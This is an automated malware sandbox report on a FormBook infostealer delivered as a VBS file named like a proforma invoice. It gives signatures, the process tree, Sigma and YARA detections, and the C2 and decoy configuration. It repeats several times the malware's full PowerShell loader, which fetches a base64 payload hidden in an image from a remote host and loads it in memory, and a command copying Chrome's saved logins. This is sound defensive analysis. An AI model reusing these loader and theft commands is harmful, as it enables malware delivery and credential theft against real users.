Windows Analysis Report
Signed Proforma Invoice 3645479_pdf.vbs

Overview

General Information

Sample name: Signed Proforma Invoice 3645479_pdf.vbs
Analysis ID: 1428347
MD5: 9e049f3029a5a6df1ab5d77d1a934ce3
SHA1: a31e0f94e0ee4dba78bc8adc291e1035d48561bd
SHA256: 0831fee0915f056e6ca78e9a83a2fe75260a197c0d64e7a200ab8ebfc3479536
Tags: vbs

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Creation with Colorcpl
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Browser Data Stealing
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6940 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MSBuild.exe (PID: 7032 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 7004 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
            • colorcpl.exe (PID: 4584 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
              • cmd.exe (PID: 1704 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • firefox.exe (PID: 1748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
{"C2 list": ["www.lunazone.us/m07a/"], "decoy": ["shakishaskakes.com", "com222.shop", "thailand-package.in", "apexu.xyz", "xlmagnemite.com", "nagapura.com", "auralights.store", "springupfashionsalon.com", "ecoessentiaer.shop", "myorra.com", "xasvcd.xyz", "zachbynesdesigns.art", "qdaoxingsujiao.com", "workproapi.site", "pbmengineering.com", "cioccasubaruspecials.com", "tmotest.com", "yipaijihejiaoyu.com", "msaway.com", "jfn3d.cc", "potentpolitics.com", "gumuszemin.com", "elimmedcentre.com", "tveuropetravel.com", "cryptoshipping-cargo.site", "123b.bingo", "auspilifepharma.com", "nacob.top", "cnexam.net", "royal-buttons.com", "stanleywarner.autos", "s1mple-giveaways.com", "cairns.care", "slimshakeshop.online", "speakgeni.us", "qnttlw.com", "kitty-fit.com", "recordlabeltime.com", "balancceer.top", "cerkust.info", "cursosead.pro", "ukrfilmtrest.com", "rewardraptor.net", "welqi.com", "chronotypecolab.com", "loj-wroie.com", "lauracecilia.com", "luminouscar.info", "theschoolofbooks.shop", "manjuc.xyz", "successchasersltd.com", "matchuplover.com", "proomtb.com", "rankrise.shop", "theiceden.co", "adeptetho.com", "myshup.net", "bet7839.com", "propertiesfinance.com", "izii.online", "herb.boutique", "nobook.xyz", "yucampos.co", "liabillityinsurance.com"]}
Source | Rule | Description | Author | Strings
00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      5.2.MSBuild.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        5.2.MSBuild.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          5.2.MSBuild.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.2.MSBuild.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.MSBuild.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17a39:$sqlite3step: 68 34 1C 7B E1
          • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a68:$sqlite3text: 68 38 2A 90 C5
          • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
          Source | Rule | Description | Author | Strings
          amsi64_3492.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

            Spreading

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += 
$webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=d

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count 
$links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=d
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 4584, TargetFilename: C:\Users\user\AppData\Roaming\J4L3O90F
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", ProcessId: 6940, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\colorcpl.exe", ParentImage: C:\Windows\SysWOW64\colorcpl.exe, ParentProcessId: 4584, ParentProcessName: colorcpl.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 1704, ProcessName: cmd.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.187.200, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6940, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { 
try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=d
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random 
-Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=d
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", ProcessId: 6940, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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

            Data Obfuscation

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"

